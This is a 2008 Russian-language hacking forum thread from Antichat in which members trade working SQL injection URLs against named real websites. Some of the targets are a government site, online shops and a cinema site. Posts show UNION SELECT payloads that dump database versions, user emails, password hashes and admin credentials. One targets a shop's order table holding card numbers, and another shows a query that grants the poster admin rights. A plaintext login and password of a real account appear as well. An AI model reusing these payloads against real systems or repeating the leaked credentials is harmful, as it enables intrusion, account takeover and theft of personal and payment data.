Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.09.2008, 18:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от lstsgoman
http://www.diza.in/pages/?id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3/*
4.1.22-log:intelco1_intelcom:intelco1_maxanda@localhos
Помогите узнать нвзвания таблиц  ужо запарилсо... http://www.diza.in/pages/?id=-1+UNION+SELECT+1,id,3+from+forum.ibf_members/*
но в ответ:
ERROR: SELECT command denied to user 'intelco1_maxanda'@'localhost' for table 'ibf_members'
так что не получится. Но такая табличка есть 
|
|
|
11.09.2008, 18:44
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
2 prescott
Код:
http://www.product.ru/debetorShow.asp?IdDeb=-20+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14--
А говорил - union не катит... |
|
|
|
11.09.2008, 23:57
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Код:
http://www.cajaviviendapopular.gov.co/not.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11/*
5.0.22:cvp:basecvp@localhost
Код:
http://www.consuladopoloniasp.org.br/publicar/view-not.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5/*
4.1.22-standard-log:consuladopolonia:consuladopolonia@200.234.200. 22
|
|
|
|
12.09.2008, 03:11
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.elcom.md/category_1.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a3a,mail,psw),15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44+from+elcom_users/*
Через создание лота есть возможность залить произвольный файл )) SECURE ON ...
|
|
|
|
12.09.2008, 03:56
|
|
Новичок
Регистрация: 22.11.2006
Сообщений: 5
Провел на форуме:
43889
Репутация:
13
|
|
шопчек
http://www.lasermax.com/product.php?id=9999999'+union+select+1,email,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28+from+old_emails/*
admins
http://www.lasermax.com/product.php?id=9999999'+union+select+1,cardnumber, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28+from+store_orders/*
store_orders:
orderTime confirmation_id email phone b_first_name b_last_name b_address_1 b_address_2 b_city b_state b_zip b_country b_county taxrate s_copy s_first_name s_last_name s_address_1 s_address_2 s_city s_state s_zip s_country s_method cardname cardnumber cardtype expmonth expyear subtotal shipping tax total waiting fulfilled confirmed exported
columns:
Код HTML:
CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS Links admins 18 blast2_list blast3_list blast_list comments dealers 23 distributors downloadImages downloads expert_reviews faqs installation_guides news newsPrefs old_emails old_lelist product_updates remove_list state_lookup store_cart store_cartitems ? store_categories store_codes store_item store_item_details store_orderitems store_orders testimonials tradeshows tradeshows_le zipcodes
5.0.45-log
lasermax
viewer@localhost
Последний раз редактировалось Evil_Grey; 12.09.2008 в 13:43..
|
|
|
|
12.09.2008, 19:39
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a3a,nic,upass,adm),16,17,18,19,20,21,22 ,23,24,25,26,27,28+from+user+where+adm=1/*
У конторы котора делала этот сайт все проекты дырявые.....
|
|
|
|
13.09.2008, 00:55
|
|
Banned
Регистрация: 04.06.2008
Сообщений: 402
Провел на форуме:
2267346
Репутация:
719
|
|
http://www.h4cky0u.org/viewtopic.php?f=6&t=28114&start=0&st=0&sk=t&sd=a
раскрытие пути. в общем чтото странное =)
ответ № 6666 =)
|
|
|
|
13.09.2008, 16:37
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Сообщение от USAkid
http://www.kinoafisha.ru
В догонку еще один уязвимый скрипт с этого же сайта -
Код HTML:
http://www.kinoafisha.ru/wf/branch.php?id_br=63297+union+select+0,1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables/*&id_s=8
Код HTML:
http://www.kinoafisha.ru/wf/branch.php?id_br=63297+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),5,6,7,8,9,10,11/*&id_s=8
|
|
|
|
13.09.2008, 16:59
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.ecub.com.ua/index.php?target=3&sem_id=-1+union+select+1,concat_ws(0x3a3a,user_name,user_p assword),3,4,5,6,7,8+from+users+limit+0,10/*
login: junglin
pass: spider
очередные пидоры...
|
|
|
|
13.09.2008, 19:36
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773
Репутация:
632
|
|
Только сначала регестрируемся
http://www.lucianopires.com.br/idealbb/profile/default.asp?pvtFolNo=0'
далее при помощи запроса:
0';update [dbo].[Members] set [dbo].[Members].[M_Level]=3 where [dbo].[Members].[Member_ID]=3407--
где 3407 был мой ид
мы становимся админом  )
и так в итоге
liar - login
123123 - pass
и мы админ
Зы:вообщето есть видео этого взлома но на моём жопорезе и побайтово накладно выйдет поэтому давольствуемся этим
Зы2: заходим с оперы, так как сайт может быть небезопасен, ну вообщем я предупредил
Последний раз редактировалось Liar; 13.09.2008 в 19:41..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
